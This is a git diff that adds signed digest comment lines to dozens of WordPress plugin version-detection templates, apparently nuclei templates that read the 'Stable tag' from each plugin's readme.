@@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cea6afabd8a785f41040db23ab23537cdfac052444b3a29e71f3d451f3da35fb0220640016be59bf3f0458887004a71212d9c2b146e648f2067952b1274605a29ae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2ed..7ebda61950a 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009bbfcf881ce6986d11134979b3a10119c0f46272243bf52f49479d43ed653278022031a72e4dab5002cc6a0686490edc5fe8120da682a131f2d44d1f052d1aefa653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f556..6f071a3da98 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220709a4af0e03355f50baef84b992ac460de6c8ff2854312c2cb65182bcf9c17ca0220726d9a9362dccf2d9ee57c49c24ee2d4e0f921bdd4611962185a68dabe01cbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d042..00e38ad6c18 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe4cea615da0ffda9fc6b7c4bfe5ee5b19f1e313ea3792fd325b513610a9784b022020ad9f1388142e76050685ec797d7f5bfdee1e2edbadfa78248ed61eaf92072d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f4469..9169535d1ce 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204145de7639cc1b1225f4f30e0da6bf93542ccc82da81f64595c855ffea9c8a87022100e7580bac81bed25a8f4861b105cecd638766f5d5a802d10916c8b77cff991985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e6..cc62911c192 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ed66c4f82a8b1a7edcf387ed7b8a3dfd0ea437018b0d9ac5bfd06b38b37f097022047b564573c1e0f45513c07c9a0cb886e26d95f86958f17b8636c35814dc706b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e9..29f3c49dfde 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071e9ba3276bb6ccee34bf80f78ff3171c59ed72e2863857e5a27cd5924b2e81202210088debec8e4cd634bd6c04c791dbee0722732b50fac5363099fd449c67718fad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1f..84cf6d52591 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050210f2739e84ab2315aec101a2b1b78a8460eaa55fa113c525502804293774802204c02f6cbe9912c96871b4a18ba870283f6c46d086e72b07f31e0baa5f1ac7572:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd5..e5fbd7fbce8 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7d7ca031d1771aabc8310dd91b4edbe5836fed4caf3e5a8846df5e45144364802202861f36e475b15f0a4dda3b3d8d431388d0d8d570b847c6d82c2e7409a3b795a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84c..9757d352b86 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220407b8270a888eab8d27d48c56469863d7c257b2c1e151a22c6b69f05946e14c4022100aba9488af54b37776840353735ae7e7434d96bf4f5ae7fd62f61a797a7a74d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2ce..37a39b50f1c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071102dd3ef8b9429c58bf1ff3d380bac7e423dddc74a7d5be96c8c8f9b950152022012985ee2d1b630b2c76f0415d272c017406a638539a26c254738a9f65d049aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a944..ad45586645b 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c2735165c359a62362caa9dc2940856bd529681584d05b70f046b9aa38ac4b902204ffd5ced6808b59a8c62bcee226179a3a3cbb853f555dbefd4f8e1bf74e0394d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dca..0966778d1df 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100971f0e867db9fee6f82e8a9be2c8b11f025965ec0c40c4b254dcff50c6c1559302200d98519b412ce1e3f275592cbaf7bf50be10bf7994158d2550449b140cd1025f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e5326941673..0f4dd37339e 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d9211a5d9755542f5e97ec2d5365fbb69045553c59d0215ad3088fef270ef0402200c48774e12ca64ab2fe4ffbc009488bb240ea029ec8c1e486612b4f6070dbeba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d6..40912e7bef5 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c9a642ded85e17fb8d4614fa3319499bfad496c9174d610f4c00ad20bceff46022100af0250c6674f9432b1db7b2c47250b0967ca24e4bf46a48be2a655904180f5cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c3..9f5ff700899 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f355efef4b0692c4a410999cf5c56273af728c685b077d903ddcd0a567c28555022004daf9c15c0344b0041158ac0127791fc33565296bbc9a9968387eda323b8382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a3..0fb27122131 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206fd6ac61652f09c38441af57e41332f1ef319ea9505fe7a6e25bb8b84c7300a2022100c6ea0c1bec0c9f30ae97e9e2f00bf5415d96e22083c66696a2d75a7233e41dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179ee..85f9d4dd41c 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0489e98cbee36f2d519ed2132aa4bdf98f6779595d172b48e0f58c4283256a40221008a1bb4e48bbf3b6f60f2e095145a9c42c76ab4973bdf60a56bdc8db93d143232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d139..484d05568e5 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220726fdc56f174f32ce1f57633658bbbb931791c7aeeff5bc205ccdaf7236e66ca0221008d26077d5ab7cd4d7276f82370739051d062df947958aaf8eb9c74c5305381f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f6..1585a492a66 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202951798b98db029bf2c9ae44a87f6b104846f558f1ca3ce467630ae5ce8080c3022005255aae64b16cb658554563818968d3751bd18c2cbc87b8b297e54c098b270a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924be..9f9b0e9750b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040b4fa74071dbd6ccf8e709389f82680c43519f722c0ed279c90f8bfe825e607022100c22c19b7fcfb1be4b95ae6024ea7b7c4da2b9ab630d1e841d12cf1bfa8dea02b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a39..fc411f04771 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a49d790cbae6e8ee9cbbc511cb99457aa63aa54a546beef376343201e8132af2022100b1404cc4f5ea88e0cb03746155108d46554a0db6b0c0c5852ff68ab7bfbaf086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4a..cafa81c313b 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a1a96984dd342fad97ce049269e20792b61b25180e8f4e523bd9285d2d89a8e0022027fbb8b5536766efed03d45243dc8613eb00077d835e83ed780389dc4cf1ee85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545d..f95a8118cc0 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a53804aff7c555d5171836d67825181371dfb00df4b3a87f8d54cace759b464022100df5e3683b2fbc48c5f293fe0cce80e61e1547500c6f7abb1307b7ac0afbb1010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f181225..adac927a5ec 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bfb8cde8ae0528d69319be09881727465c5fe17857dc14cade66e6f0c2ba91c0022100fb020e823514e6fa1976896ae24ff31d5aa807561974bf03bb2c55573304fca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d5369..a4769c5d3be 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220322915d1f108443f4e019c02f11b6b5a24c9a7e19212bdbae9748d0f794ec59e022100b4d3fe5b326d5c4b90a4140fbca6cf9fa97ddef5ed33c9b87e60a02ea91e756d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1d..d162c1b5206 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d929ba60a2428f629953b79440c66120cc0bcc6e55f65923c83a2fdaea8f4a6022100e398b6cff4a889199b8327740746152abae170b0f1287dd318a1ad93bbb0d662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc979..ff73541d733 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205700ef9265108765eb6ef02305c6401b9f77d509d274c66613303aac2b0a3ff1022100e12f2fedbc18ba082c5dd06490dd29075322adda40c0372485d30fff5c3d2a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f934..91d4bf2133e 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ea22ab91bc487d3d8f3dcabf0473e6b439c7ae656b7b93df40b4e84ca01f8cec022054e04c83a65bc0a26e14717a788a738c16bca8424fa33e72050d29f7b2b91417:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf361..f3179476893 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6ccd9c980781936b5572b258ce57c70727457d2fa11148f7adb0d47809f78ce022100ca7a01cea79aa977f5e2b4d840b62a8baa7682331a329c57de081a553018070e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d26..e2a876e0a41 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ec24481b969b7fe79926434ce5997ee56735d0f324e9797e723f2be2684245902201a4eb35bf01842e25e438290d2439ea136e3af47013c07e67470617b46d189a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86e..8bddbbb2f38 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a520f8576ec2c087dcfc3d803870c50a06b9c747b006390a6d12c97da8ba6c9402201852665f83b31c97fad09b8f0ce3ea082f0519905ba189c65d0d739c8253a70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b6..b533d8586bf 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201aeafc2c156aa5c236c3a53f91cb30c96ec6af27c5645af68a60ef4589321f82022100cdf86fa7506d924657e2ae623c1ddba5b1cdd0c34d8d8403edf53f89d91d6607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b0..5c3d306310f 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200090009450403f6a5a9ccfaa5554b1d4f3b4c033f74843dfd7163c6b74554c99022100a9ce85bb652b19abef9b998e31002a2cd318ba173e1af7a52ac11f36ae67b730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566f..da690aff05b 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0643621521d09d1ddd33af33582bceb1cc4f3993ba987e11f94aee11c5b9a0a022019c2d80ba1e2fd3bd4ac5477df77d10a21c227ae9f83651e5a9f312b063169fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a154..e34d6eee964 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d32eea4909e812eeb6cbb21d6a7d775ccdcf4dba4ea353a05d9869981f96b60d022100d394ad44392227ff99a7455928b7bd49339575df062978eb92137ba7abf9c21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f2..5388d3fb875 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f266197e195711be19755b2333c27169c1bff48bd18844b72404f1c4e56780ec02201ade20f25fb874768c0ca7ed55c41da945270127af82098d42159266451eca89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c920917673..71630a2b8f9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220405e4a1e7aed40a6951a87cb55ad67b1ba5ff1b05d40b55d3b1fe9a8d9fdc076022061cec54bfca44a9d15499dd38cf7efa3f1b2f55f22aabe23a34f21506949fadd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9ce..fddad029592 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220185c511b3ea86dbc15929f39e0acffa390f20547da5ba1a67280859d930ca1a302210087f4088b3d38bd3be7b72e7a5064ebb4d3ad40f005e63b9b0f907d0d65d27d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05e..a0b003c8a1a 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0a6c195ebb01da30f02273a7658ba98638bddcfce5416e721708e2c823506e7022100f69bdb41aab213e85154c6d1d8fd9c5419e7dc323438c51a6e7f569a3057dca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce34093..9ad02e3e489 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057c3c6180869842efbca0f022730c41c022a25c13a7ac7c60aecf50d48e6cfb902206d2287e620ad689f4e1abc33501340d6f5172c1b40a6afafd9673a20703cae3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8dad..e3d768d42a5 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbf4651f37d9c426fb34140b73514ac1f9581c7c0b37016c6400a9257d8a1cca022025635eb46f739b1002dee1686dda3585a0959af9c42c8f4a85e7fd334f4dc150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eba..cddc6ed08d7 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff471df4d02e6252c0df06c22f381c3b0caa74340f14e76cbf2fd32c950b546c02207a94e2b3e16614335ca466e85488033e09c8d317de342c98977aaa80e2a054e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df5..03bfd6ab663 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009f0cb09e0b36354a7135e113df10d72f46eb4cb2b7b1f1f3fd9ce0caf21fe240022100cca8ca9d1c038041afcdd2ce5f09e38ca199f1cfb537dc4e51edb423dc3fddb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73ed..3d04f0008dd 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f80d8e9f31836ab45221eec9bcbea0ee6bfbc11d2f8cde5292c1534c091cc4d022027db193cc72b4151d6ec16749760ce79b30c324459e936df25c7aaf074580a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f00931279..ee5b095b5e2 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022046a7a42e09b7804352f7200f88880e1fff60984ebabb7786d561ffdb0309a329022100aa44403ddfcee52e3b6f17bb8367305894b3cb383b6d544603d033a932c14ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d6..48076ff2304 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207cb19141a5e73a34fda7560cadc98f1802f766b3ad45bb9aaed676d24ee23bbc02203a42c65c94b3323c003fda7a8a50dbb1aa9a932a292223842dee3daafef40bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d8..7bdaef021f9 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ 